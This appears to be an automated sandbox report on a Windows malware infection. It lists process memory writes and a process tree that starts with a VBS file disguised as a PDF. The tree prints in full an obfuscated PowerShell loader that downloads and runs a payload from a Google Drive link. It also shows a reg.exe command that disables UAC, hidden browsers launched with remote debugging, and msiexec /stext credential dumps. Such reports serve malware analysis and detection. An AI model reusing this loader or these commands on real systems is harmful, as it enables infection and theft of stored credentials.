PID 2548 wrote to memory of 2304 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2548 wrote to memory of 2304 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2548 wrote to memory of 2304 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2548 wrote to memory of 2304 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2548 wrote to memory of 2304 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2548 wrote to memory of 2304 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2548 wrote to memory of 2304 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2548 wrote to memory of 2304 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2548 wrote to memory of 2304 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2548 wrote to memory of 2304 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2548 wrote to memory of 2304 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2548 wrote to memory of 2304 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2548 wrote to memory of 2304 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2548 wrote to memory of 2304 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2548 wrote to memory of 2304 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2548 wrote to memory of 2304 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2548 wrote to memory of 2304 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2548 wrote to memory of 2304 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2548 wrote to memory of 2304 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2548 wrote to memory of 2304 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2548 wrote to memory of 2304 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2548 wrote to memory of 2304 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2548 wrote to memory of 2304 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2548 wrote to memory of 2304 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2548 wrote to memory of 2304 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2548 wrote to memory of 2304 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2548 wrote to memory of 2304 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2548 wrote to memory of 2304 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\074c592b-5cc0-496d-b3fa-45a09d4363ce·pdf.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#nonargumentatively Dendrocoela Coalmonger Doorway Foranstaltningerne Socialcentret #><#Kiddushin Christins Isoantigen Pangas Timucua Uniformising servicekonceptets #>$polypian='Berytidae';function Mandages($Bellwether){If ($host.DebuggerEnabled) {$Balkily++;$Formummede=$Bellwether.'Length' - $Balkily} for ( $Hurraet=4;$Hurraet -lt $Formummede;$Hurraet+=5){$Alejandro=$Hurraet;$Buhkoen+=$Bellwether[$Hurraet]}$Buhkoen}function Tervariant($Replanter){ .($Socialhjlpsmodtagere) ($Replanter)}$Nringsmaterialerne=Mandages ' AskNStvlEEv cTSved.BlksWMas EUnnaBUndec alsl ReviVasoeOldnnForlTCrin ';$Hurraetngrainedness=Mandages 'Lft,MSl goFirez B oiEd.elUdmrlMagtaLunc/Mag ';$Acidulousness=Mandages ' Fi Ta.tilEsths aml1Sven2Zebi ';$Stevedoringerne='Rain[Fem.NBetaeMiniTn rm.SejlSEntre ProR T,mVBeami K ncDidaE opdP Beeo P uiHjb.nLap,tJunimmisoaAny,NRel,Apl tgKab.esygeROpre] A.r:N.na:Bl aSGyltEMucoCMan uhjesRInv I Pyot,tevYKaraPEc tR IleOBesut ravO GascS bsoAci lTeks=Nava$ TumaAngic ori SelDN ncU alolKommOFor,u legsdeacN UndEStemSAb as Vel ';$Hurraetngrainedness+=Mandages 'Mam 5Ove .A el0L.nk An a(Su.eWSetoiFabrnHomodKingoOmgrwE apsDans cleiNT ioTSort Aars1Khes0lvsp. obj0 ise;Sc e NonoWBrndiU ben Skr6Trfo4Stam;rase T naxVare6Avan4Con,;Unde OmkorBegrvPolo:Ejst1Task3Vol 1Fant. usk0Virk)Idle SamG kjaeFjarcbrank ostoFolk/Afsk2.orb0Sne 1 Cur0Wast0,rut1 am0Inte1Out Sa.sFElasiBortrL ste llfUnhooFlytxSkra/ b.t1 S.l3Prev1 et.Seti0Lobb ';$Rundrejserne=Mandages 'ProguF.rbsAfvaEMaanr S n-J spa AkaGAun eflodn S.etAphe ';$Skanke=Mandages 'Diath Dr t FeltSvmmpDeflsScu.:.eci/ Gus/Pr tdSuccrHeksiMis.vPothe .ac.Uncag iloRaceoRoekgRectlBidseSemi.Romac S.eo.ealm pos/RednuIllecA.th? skeeEnwoxK ckpTacioStifrStbetNonp=Prstd RegoTretw M nnBed,ldidaodal abijedBis &PinniE ecd ,in=Konj1Esp OPla m.epiV TrfE inQ.bilTPraezImmeE NonFMic USpud0UpmoCMarcm Tr PDo.nxVa sErecrdLynlID.sbDGru TKo sM PetBBystK moozS,ntKBill0 SkaLspndvLoveQTranC E,rDEpicxFart ';$Blyantsstiftens=Mandages 'I du>N nb ';$Socialhjlpsmodtagere=Mandages ' LaniStanELangXR gs ';$Resetter='biografiskes';$Leadout='\Overballast.Van';Tervariant (Mandages 'Dift$ HypgAnsvLBrneoIndbbBrugAB dsl P r: Anot,avnI InslEfteGFo.koSkold.once u.pS HysKMagaRCircIIntiVfstne Hux=buga$PseuE desnoutbVRead: gr ACiviP c,rpForudCiviaMo.ltForeA.ret+Gast$ VallVandeja iAB red,nbooNoneUEditTSubl ');Tervariant (Mandages 'Valg$ ,lkgBuddLFldno KryBPebaAA kol ,dk:Ca cAEksplLedelnineO S uPNattLDosmA WorsSr mMplne=Gorm$ verS Tork Du ARenoNUnc.K audeSa p. DynsMe aPApotL holIUndeTBar,(Reta$ Ti bFarrl ProYNaamADataN ForT AfssPreesDataT redI.ollFSuccTGasbeMegunK.ypsUnde) Amb ');Tervariant (Mandages $Stevedoringerne);$Skanke=$Alloplasm[0];$Bagstavnenes=(Mandages 'Demo$FritgVil,lA stOSemibPleuAFli l ol: ExclFumeE dapRSlavs ,ent ConAStraMFejlpIntreTon Tc.mu=Hav,nAtt ePrerW,eet-SkanoKogebHithJUnese isocSamatS,mi MahoSAutoYFumeSMervTdoc edatamVen .prot$.ompNWa tr VagiBilanvareGPs,mS abnMTiptANoncTKasseSalarTusii Acoa B wLAktiEResyr AffNTremE Rea ');Tervariant ($Bagstavnenes);Tervariant (Mandages 'Auto$TrstLSteme ThrrA,ies H.etKo oaSaldmA,stpnerve b,nt Unb.BowsHTraceAc ra N,gdDe,ieBogmrTernsNonc[ ve$ thuR stouS,ernSc nd umlr SyneUn ej IntsDekoeMilirMenin ArieErhv]Side=eder$Af iHKreeuMffer Manr ysia EnteAse tSnown trkgVar,rJorda rli F enDannePopud SolnFonteDys.sI,pes alg ');$bolines=Mandages 'Udb $SpreLRe.pebettrKultsSpgetp,ikaTsarmO.etpAldeeCatctVand.A baD .unoGen wE.isn illBouvoCir.a,ebgd Et FNemaiLownl TvaeDaab( F r$SydvSD.alk Stia arbnR,gikUdrieFelt, Bet$ fejFPintdSkoleLrt.nSam dSt neR adsRetn)rdse ';$Fdendes=$Tilgodeskrive;Tervariant (Mandages 'Chri$FoldGSa,oLWel OGeogB MilaPa iLJaco: TurlThr,A G nZ P,vuModeRProciC,mutTripEE cusFlle=Prin(Si,nTJur,EUtroSBlomTBun -iconp OveaKonfTProsHUrta ign$EpitFDyrpD TruePropNOstaDUn.oethorSA.pe)Opd ');while (!$lazurites) {Tervariant (Mandages 'Gaas$ Me,gAerelGrunoInteb Lsea ItclFagu: NilMT rvaSv,ncBiogr AfsawrinnCurld.ruer nteetwit=.ppe$GrahtTilrrUnbeu,riveIlio ') ;Tervariant $bolines;Tervariant (Mandages ' KalS ealtUa baSkn R Chat Ka -K ppsNanoLWos,ewebfeDaarpS ak Belu4,nke ');Tervariant (Mandages 'Attr$GravgSdcelHempOU,reBknorACrosLMa,s:Pseul Kama MisZG.tgUFal rSti IHulkt Bloe krisNonr=Non.(TrumTha,leGo,eSE nstMe l-p trP ashaFinatbankHAfst .ain$ Damf erDStavEko rnAutod M,kEIntes .vi)Inte ') ;Tervariant (Mandages 'Belg$MentGStralUr tOUn obSpisAUnifL Pro:DecicAllohScanlNo,sOSandrPer oDy,gpBusfH DomytetrcAkryehofmA TrieV.lm= Bet$ P.tgsamtLBud.oStraB eaga UnbL Tau:KirkGDissaSesqLBezzlMundESk,kO ainNFis,sNeis+Civi+Rupi%afv.$ManfAGlidLBovoL Ta ODiv.pBrstLD.taAGastsalkaMSeal.Helmc FyroUnviUPlouNNvnsTPrec ') ;$Skanke=$Alloplasm[$Chlorophyceae]}$Maze=301481;$Ruskninger=28816;Tervariant (Mandages 'Samf$ KakGOpfilTjuro Oe.BUnprAGashlR,ya:Farts oildRoi ERummSHeksTRoteONu,pfAnlifFeltePaleRTeleNJaileArboSKilo W is=Mdea Fo,GForhEsprdt Fr -In uCPartoS rmnTofrTOveremu,aNO lyTPr t Udbu$TamsfPlatD StrEPo.cNHodeDTa vE ScaSHere ');Tervariant (Mandages 'Non $Mag g G.ml.rmio rfrbSmagaMiljl Aff: .ubCLithoAktil uaroBebynUnspiVildsSubjaF eebPengistrel,kspiPlebtFl eiWinde IndsTumi Udhn= Udt dalf[TyfuSSttey Suss UnstOdeleT,scmQu.m.Ze,oCTi goRevinOddfvAsoce UtmrEn et Tv.] Mil: Ant:VandFGlimrBov.o,iccmSamfBReckaDoucs preeF jl6Oxid4SubcS F et MarrP.oviMin.nLodsgVolu( Ove$GraiS.lerdFeede evs fdt FruoRe afTrbufSti,eScorrGastnTerneVogtsPoli) ,ip ');Tervariant (Mandages 'Ud.v$CateGBlidLT rvoSootBS.maA lyvlMiss:MaftSR fot,fskIFr,kNFlamgIridF ubsI mfusPochh MaxEi,disDing Balt=Aban Dest[ Re.s oreYP rlSIliutBo.iET,moMTita.CmdrTshepeFnikXTitrtHusb. beceMariNFortcUdnaO k mD ngeiDekanA,tiGLull] ,ty:Laan: .ncALetnS CovC TiliGy eILucr.WeekgUndie luft tops Fa TGasrrCoppi prnForug acu(a tf$Per.cTangosemiLStenODresn Be,iUncrsPookAWhorbag,lI TreLTa eiPr,ktUre IShage LarSe th)In x ');Tervariant (Mandages '.can$CorwgIndelFngsO.eriBRi jaIldsLresy:BevrVpip EGenaNValgeSammkClerL SluaFrucPAss =Delt$ LevS orbTRecei.rianPelogD xtfArk I SkdsBad.HKok,eKrftSOutg.EkspsConcuEc ib T os BastRetrR .ubI LibNSt mGProg(Ranc$PerlMToteaRynkZ H aeVres, Spr$.oleRP.nju Ganspreak iftNDidliOutmnCrengenthe SurRAar ) .rd ');Tervariant $Veneklap;"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#nonargumentatively Dendrocoela Coalmonger Doorway Foranstaltningerne Socialcentret #><#Kiddushin Christins Isoantigen Pangas Timucua Uniformising servicekonceptets #>$polypian='Berytidae';function Mandages($Bellwether){If ($host.DebuggerEnabled) {$Balkily++;$Formummede=$Bellwether.'Length' - $Balkily} for ( $Hurraet=4;$Hurraet -lt $Formummede;$Hurraet+=5){$Alejandro=$Hurraet;$Buhkoen+=$Bellwether[$Hurraet]}$Buhkoen}function Tervariant($Replanter){ .($Socialhjlpsmodtagere) ($Replanter)}$Nringsmaterialerne=Mandages ' AskNStvlEEv cTSved.BlksWMas EUnnaBUndec alsl ReviVasoeOldnnForlTCrin ';$Hurraetngrainedness=Mandages 'Lft,MSl goFirez B oiEd.elUdmrlMagtaLunc/Mag ';$Acidulousness=Mandages ' Fi Ta.tilEsths aml1Sven2Zebi ';$Stevedoringerne='Rain[Fem.NBetaeMiniTn rm.SejlSEntre ProR T,mVBeami K ncDidaE opdP Beeo P uiHjb.nLap,tJunimmisoaAny,NRel,Apl tgKab.esygeROpre] A.r:N.na:Bl aSGyltEMucoCMan uhjesRInv I Pyot,tevYKaraPEc tR IleOBesut ravO GascS bsoAci lTeks=Nava$ TumaAngic ori SelDN ncU alolKommOFor,u legsdeacN UndEStemSAb as Vel ';$Hurraetngrainedness+=Mandages 'Mam 5Ove .A el0L.nk An a(Su.eWSetoiFabrnHomodKingoOmgrwE apsDans cleiNT ioTSort Aars1Khes0lvsp. obj0 ise;Sc e NonoWBrndiU ben Skr6Trfo4Stam;rase T naxVare6Avan4Con,;Unde OmkorBegrvPolo:Ejst1Task3Vol 1Fant. usk0Virk)Idle SamG kjaeFjarcbrank ostoFolk/Afsk2.orb0Sne 1 Cur0Wast0,rut1 am0Inte1Out Sa.sFElasiBortrL ste llfUnhooFlytxSkra/ b.t1 S.l3Prev1 et.Seti0Lobb ';$Rundrejserne=Mandages 'ProguF.rbsAfvaEMaanr S n-J spa AkaGAun eflodn S.etAphe ';$Skanke=Mandages 'Diath Dr t FeltSvmmpDeflsScu.:.eci/ Gus/Pr tdSuccrHeksiMis.vPothe .ac.Uncag iloRaceoRoekgRectlBidseSemi.Romac S.eo.ealm pos/RednuIllecA.th? skeeEnwoxK ckpTacioStifrStbetNonp=Prstd RegoTretw M nnBed,ldidaodal abijedBis &PinniE ecd ,in=Konj1Esp OPla m.epiV TrfE inQ.bilTPraezImmeE NonFMic USpud0UpmoCMarcm Tr PDo.nxVa sErecrdLynlID.sbDGru TKo sM PetBBystK moozS,ntKBill0 SkaLspndvLoveQTranC E,rDEpicxFart ';$Blyantsstiftens=Mandages 'I du>N nb ';$Socialhjlpsmodtagere=Mandages ' LaniStanELangXR gs ';$Resetter='biografiskes';$Leadout='\Overballast.Van';Tervariant (Mandages 'Dift$ HypgAnsvLBrneoIndbbBrugAB dsl P r: Anot,avnI InslEfteGFo.koSkold.once u.pS HysKMagaRCircIIntiVfstne Hux=buga$PseuE desnoutbVRead: gr ACiviP c,rpForudCiviaMo.ltForeA.ret+Gast$ VallVandeja iAB red,nbooNoneUEditTSubl ');Tervariant (Mandages 'Valg$ ,lkgBuddLFldno KryBPebaAA kol ,dk:Ca cAEksplLedelnineO S uPNattLDosmA WorsSr mMplne=Gorm$ verS Tork Du ARenoNUnc.K audeSa p. DynsMe aPApotL holIUndeTBar,(Reta$ Ti bFarrl ProYNaamADataN ForT AfssPreesDataT redI.ollFSuccTGasbeMegunK.ypsUnde) Amb ');Tervariant (Mandages $Stevedoringerne);$Skanke=$Alloplasm[0];$Bagstavnenes=(Mandages 'Demo$FritgVil,lA stOSemibPleuAFli l ol: ExclFumeE dapRSlavs ,ent ConAStraMFejlpIntreTon Tc.mu=Hav,nAtt ePrerW,eet-SkanoKogebHithJUnese isocSamatS,mi MahoSAutoYFumeSMervTdoc edatamVen .prot$.ompNWa tr VagiBilanvareGPs,mS abnMTiptANoncTKasseSalarTusii Acoa B wLAktiEResyr AffNTremE Rea ');Tervariant ($Bagstavnenes);Tervariant (Mandages 'Auto$TrstLSteme ThrrA,ies H.etKo oaSaldmA,stpnerve b,nt Unb.BowsHTraceAc ra N,gdDe,ieBogmrTernsNonc[ ve$ thuR stouS,ernSc nd umlr SyneUn ej IntsDekoeMilirMenin ArieErhv]Side=eder$Af iHKreeuMffer Manr ysia EnteAse tSnown trkgVar,rJorda rli F enDannePopud SolnFonteDys.sI,pes alg ');$bolines=Mandages 'Udb $SpreLRe.pebettrKultsSpgetp,ikaTsarmO.etpAldeeCatctVand.A baD .unoGen wE.isn illBouvoCir.a,ebgd Et FNemaiLownl TvaeDaab( F r$SydvSD.alk Stia arbnR,gikUdrieFelt, Bet$ fejFPintdSkoleLrt.nSam dSt neR adsRetn)rdse ';$Fdendes=$Tilgodeskrive;Tervariant (Mandages 'Chri$FoldGSa,oLWel OGeogB MilaPa iLJaco: TurlThr,A G nZ P,vuModeRProciC,mutTripEE cusFlle=Prin(Si,nTJur,EUtroSBlomTBun -iconp OveaKonfTProsHUrta ign$EpitFDyrpD TruePropNOstaDUn.oethorSA.pe)Opd ');while (!$lazurites) {Tervariant (Mandages 'Gaas$ Me,gAerelGrunoInteb Lsea ItclFagu: NilMT rvaSv,ncBiogr AfsawrinnCurld.ruer nteetwit=.ppe$GrahtTilrrUnbeu,riveIlio ') ;Tervariant $bolines;Tervariant (Mandages ' KalS ealtUa baSkn R Chat Ka -K ppsNanoLWos,ewebfeDaarpS ak Belu4,nke ');Tervariant (Mandages 'Attr$GravgSdcelHempOU,reBknorACrosLMa,s:Pseul Kama MisZG.tgUFal rSti IHulkt Bloe krisNonr=Non.(TrumTha,leGo,eSE nstMe l-p trP ashaFinatbankHAfst .ain$ Damf erDStavEko rnAutod M,kEIntes .vi)Inte ') ;Tervariant (Mandages 'Belg$MentGStralUr tOUn obSpisAUnifL Pro:DecicAllohScanlNo,sOSandrPer oDy,gpBusfH DomytetrcAkryehofmA TrieV.lm= Bet$ P.tgsamtLBud.oStraB eaga UnbL Tau:KirkGDissaSesqLBezzlMundESk,kO ainNFis,sNeis+Civi+Rupi%afv.$ManfAGlidLBovoL Ta ODiv.pBrstLD.taAGastsalkaMSeal.Helmc FyroUnviUPlouNNvnsTPrec ') ;$Skanke=$Alloplasm[$Chlorophyceae]}$Maze=301481;$Ruskninger=28816;Tervariant (Mandages 'Samf$ KakGOpfilTjuro Oe.BUnprAGashlR,ya:Farts oildRoi ERummSHeksTRoteONu,pfAnlifFeltePaleRTeleNJaileArboSKilo W is=Mdea Fo,GForhEsprdt Fr -In uCPartoS rmnTofrTOveremu,aNO lyTPr t Udbu$TamsfPlatD StrEPo.cNHodeDTa vE ScaSHere ');Tervariant (Mandages 'Non $Mag g G.ml.rmio rfrbSmagaMiljl Aff: .ubCLithoAktil uaroBebynUnspiVildsSubjaF eebPengistrel,kspiPlebtFl eiWinde IndsTumi Udhn= Udt dalf[TyfuSSttey Suss UnstOdeleT,scmQu.m.Ze,oCTi goRevinOddfvAsoce UtmrEn et Tv.] Mil: Ant:VandFGlimrBov.o,iccmSamfBReckaDoucs preeF jl6Oxid4SubcS F et MarrP.oviMin.nLodsgVolu( Ove$GraiS.lerdFeede evs fdt FruoRe afTrbufSti,eScorrGastnTerneVogtsPoli) ,ip ');Tervariant (Mandages 'Ud.v$CateGBlidLT rvoSootBS.maA lyvlMiss:MaftSR fot,fskIFr,kNFlamgIridF ubsI mfusPochh MaxEi,disDing Balt=Aban Dest[ Re.s oreYP rlSIliutBo.iET,moMTita.CmdrTshepeFnikXTitrtHusb. beceMariNFortcUdnaO k mD ngeiDekanA,tiGLull] ,ty:Laan: .ncALetnS CovC TiliGy eILucr.WeekgUndie luft tops Fa TGasrrCoppi prnForug acu(a tf$Per.cTangosemiLStenODresn Be,iUncrsPookAWhorbag,lI TreLTa eiPr,ktUre IShage LarSe th)In x ');Tervariant (Mandages '.can$CorwgIndelFngsO.eriBRi jaIldsLresy:BevrVpip EGenaNValgeSammkClerL SluaFrucPAss =Delt$ LevS orbTRecei.rianPelogD xtfArk I SkdsBad.HKok,eKrftSOutg.EkspsConcuEc ib T os BastRetrR .ubI LibNSt mGProg(Ranc$PerlMToteaRynkZ H aeVres, Spr$.oleRP.nju Ganspreak iftNDidliOutmnCrengenthe SurRAar ) .rd ');Tervariant $Veneklap;"

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\SysWOW64\msiexec.exe"

C:\Windows\SysWOW64\cmd.exe

/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Program Files\Google\Chrome\Application\Chrome.exe

--user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9d9b9cc40,0x7ff9d9b9cc4c,0x7ff9d9b9cc58

C:\Windows\SysWOW64\msiexec.exe

C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\mjefag"

C:\Windows\SysWOW64\msiexec.exe

C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\oljybzwmk"

C:\Windows\SysWOW64\msiexec.exe

C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\oljybzwmk"

C:\Windows\SysWOW64\msiexec.exe

C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\oljybzwmk"

C:\Windows\SysWOW64\msiexec.exe

C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\yfpqbrgoycnn"

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1928,i,6851297213770189170,10307642119208422506,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1924 /prefetch:2

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2108,i,6851297213770189170,10307642119208422506,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2128 /prefetch:3

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2212,i,6851297213770189170,10307642119208422506,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2308 /prefetch:8

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3160,i,6851297213770189170,10307642119208422506,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3180 /prefetch:1

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3188,i,6851297213770189170,10307642119208422506,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3220 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4376,i,6851297213770189170,10307642119208422506,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3676 /prefetch:1

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4696,i,6851297213770189170,10307642119208422506,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4692 /prefetch:8

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4828,i,6851297213770189170,10307642119208422506,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4700 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

--user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ff9d9a546f8,0x7ff9d9a54708,0x7ff9d9a54718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2000,1526538760488115909,95538217086833128,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2012 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2000,1526538760488115909,95538217086833128,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2496 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2000,1526538760488115909,95538217086833128,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2980 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

